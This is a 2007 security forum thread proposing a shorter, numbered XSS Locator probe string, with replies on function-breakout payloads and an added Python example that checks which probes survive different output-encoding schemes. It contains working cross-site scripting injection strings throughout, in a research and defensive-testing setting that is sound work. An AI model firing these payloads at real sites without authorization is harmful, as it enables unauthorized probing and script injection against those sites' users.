Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 20, 2007 06:52AM

Hi!

I would like to propose an optimization of the XSS locator on the XSS cheatsheet and the XML files:

If you transform this...
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


... into this...
';alert(1)//\';alert(2)//";alert(3)//\";alert(4)//--></SCRIPT>">'><SCRIPT>alert(5)</SCRIPT>;=&{<script>alert(6)</script>}

... it is a) much shorter and b) you know where the injection came through.

Greetings,
.mario

Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: rsnake
Date: March 20, 2007 03:59PM

I like it, but if I have more space, I'd want to use it again :) Hahah... Ah, the perils of having so many different types of issues!

For instance, the first section might work, but it might be inside of a function that you need to close out:

function bob() {
do_stuff("your text goes here");
}

To get around that you'd need something like:

");}alert(1);function xss(){//

- RSnake
Gotta love it. http://ha.ckers.org

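The two posts above read together as a test for output encoding: each number in mario's string names the context whose break sequence survived, and RSnake's follow-up is that the reflection point decides which numbers matter. The following is an added example, written for this page and not code from mario, RSnake or the cheatsheet. It takes the numbered locator string from the thread as input to three constructed renderers of the same page (unencoded, quote-backslashing only, and context-appropriate encoding) and reports which numbered probes are still live in the output. The context labels, the "live" regex heuristics and the template are the editor's assumptions, chosen to match the probe string on this page; they do not know where in a real response the value landed, so the report is a regression check on encoding, not a verdict on exploitability.

```python
import html
import json
import re

# The numbered locator string from the thread, as a Python raw string.
PROBE = r"""';alert(1)//\';alert(2)//";alert(3)//\";alert(4)//--></SCRIPT>">'><SCRIPT>alert(5)</SCRIPT>;=&{<script>alert(6)</script>}"""

# Editor's reading of which output context each number stands for (assumption, not from the thread).
PROBE_CONTEXTS = {
    1: "single-quoted JS string, quote not escaped",
    2: "single-quoted JS string, quote backslashed but backslash itself not escaped",
    3: "double-quoted JS string, quote not escaped",
    4: "double-quoted JS string, quote backslashed but backslash itself not escaped",
    5: "HTML context: </SCRIPT> / attribute break followed by a new <SCRIPT>",
    6: "HTML context: bare <script> tag reflected",
}

# Constructed heuristics: a probe counts as "live" when the character sequence that
# would break out of its context survives in the rendered output unencoded.
# The lookbehind rejects a quote the application backslashed; the doubled backslash
# in 2 and 4 catches the case where the attacker-supplied backslash neutralises that.
LIVE_PROBE_PATTERNS = {
    1: re.compile(r"(?<!\\)';alert\(1\)"),
    2: re.compile(r"(?<!\\)\\\\';alert\(2\)"),
    3: re.compile(r'(?<!\\)";alert\(3\)'),
    4: re.compile(r'(?<!\\)\\\\";alert\(4\)'),
    5: re.compile(r"<script>alert\(5\)</script>", re.IGNORECASE),
    6: re.compile(r"<script>alert\(6\)</script>", re.IGNORECASE),
}


def live_probes(rendered: str) -> list[int]:
    """Return the probe numbers whose context-break sequence survived encoding."""
    return sorted(n for n, pat in LIVE_PROBE_PATTERNS.items() if pat.search(rendered))


def js_string_escape(value: str) -> str:
    """Encode value for a JS string literal of either quote style: JSON escaping
    handles backslash and double quote, then every other syntactically significant
    character becomes a \\uXXXX escape so no quote or tag can form inside the literal."""
    body = json.dumps(value, ensure_ascii=True)[1:-1]
    for ch in "'<>&/":
        body = body.replace(ch, "\\u%04x" % ord(ch))
    return body


# Constructed page template: the value is reflected once inside a single-quoted
# JS string and once in the HTML body.
TEMPLATE = "<script>var who = '{js}';</script><p>Hello {body}</p>"


def render_unsafe(name: str) -> str:
    """No encoding at all."""
    return TEMPLATE.format(js=name, body=name)


def render_backslash_only(name: str) -> str:
    """Common half-fix: backslash the quotes in the JS string and HTML-encode the
    body, but forget that the input can carry its own backslash and that </script>
    ends the script element no matter what the JS string state is."""
    js = name.replace("'", "\\'").replace('"', '\\"')
    return TEMPLATE.format(js=js, body=html.escape(name, quote=True))


def render_safe(name: str) -> str:
    """Context-appropriate encoding at both reflection points."""
    return TEMPLATE.format(js=js_string_escape(name), body=html.escape(name, quote=True))


def report(label: str, rendered: str) -> None:
    """Print which probe numbers are still live and what each one means."""
    hits = live_probes(rendered)
    print(f"{label}: live probes {hits or 'none'}")
    for n in hits:
        print(f"  {n}: {PROBE_CONTEXTS[n]}")


if __name__ == "__main__":
    report("unsafe", render_unsafe(PROBE))
    report("backslash only", render_backslash_only(PROBE))
    report("safe", render_safe(PROBE))
```

Running it shows the point of the numbering: the unencoded page lights up 1, 3, 5 and 6; the backslash-only fix silences those but moves the problem to 2 and 4 (the supplied backslash escapes the added one) and still leaves 5 and 6 live because `</SCRIPT>` inside the JS string closes the script element; only the context-aware version reports nothing live.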
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 21, 2007 03:50AM

Yes - I guess it's not even close to possible to cover all variants in one string, but developers tend to make the same mistakes over and over again (including me).

The other day I thought about a vector which shows what characters you could get into the site to render HTML - like:

<s>111</s>&lt;s&gt;222&lt/s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%31%31%31%3c%2f%73%3e....
(... and so on)

Greetings,
.mario

Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: hackathology
Date: March 27, 2007 01:15AM

Nice one mario.... I am to format my own string.

http://hackathology.blogspot.com

Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 27, 2007 10:00AM

Thx hackathology - don't hesitate to post when done ;)

Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: rsnake
Date: March 29, 2007 09:26PM

Yah, agreed... I am always interested in new variants of the XSS Locator. Not because I use it (never do) but because it's an interesting case study on a single vector with mass exploitation potential (particularly useful in worms and scanning).

- RSnake
Gotta love it. http://ha.ckers.org
